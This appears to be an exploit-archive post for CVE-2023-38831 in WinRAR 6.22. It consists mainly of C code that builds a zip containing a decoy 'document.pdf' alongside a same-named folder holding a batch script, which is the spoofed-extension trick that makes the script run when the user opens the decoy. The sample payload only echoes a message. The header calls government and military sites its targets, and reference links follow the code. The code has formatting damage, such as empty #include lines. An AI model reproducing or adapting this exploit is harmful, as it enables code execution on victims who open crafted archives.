################################################################################################ # Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Security Risk : High # # # # Description : All target's GOV & Military websites # # # ################################################################################################ # # # Expl0iTs: # #include #include #include #include "zip.h" #define PDF_FILE "document.pdf" #define FOLDER_NAME "document.pdf\\" #define SCRIPT_FILE "script.bat" #define ZIP_FILE "exploit.zip" int main(void) { zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE); if (zf == NULL) { printf("Error opening ZIP file\n"); return -1; } zip_fileinfo zfi; memset(&zfi, 0, sizeof(zfi)); if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding PDF file to ZIP file\n"); zipClose(zf, NULL); return -1; } FILE *fp = fopen(PDF_FILE, "rb"); if (fp == NULL) { printf("Error opening PDF file\n"); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } char buffer[1024]; int bytes_read; while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) { if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) { printf("Error writing PDF file to ZIP file\n"); fclose(fp); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } } fclose(fp); zipCloseFileInZip(zf); if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding folder to ZIP file\n"); zipClose(zf, NULL); return -1; } zipCloseFileInZip(zf); char script_name[256]; sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE); if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding script file to ZIP file\n"); zipClose(zf, NULL); return -1; } char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n"; if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) { printf("Error writing script file to ZIP file\n"); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } zipCloseFileInZip(zf); zipClose(zf, NULL); printf("ZIP file created successfully\n"); return 0; } https://nvd.nist.gov/vuln/detail/CVE-2023-38831 https://nvd.nist.gov/vuln/detail/CVE-2023-38831 https://github.com/HDCE-inc/CVE-2023-38831 https://www.cvedetails.com/cve/CVE-2023-38831/ https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/ https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831 http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/ https://news.ycombinator.com/item?id=37236100 https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/ https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2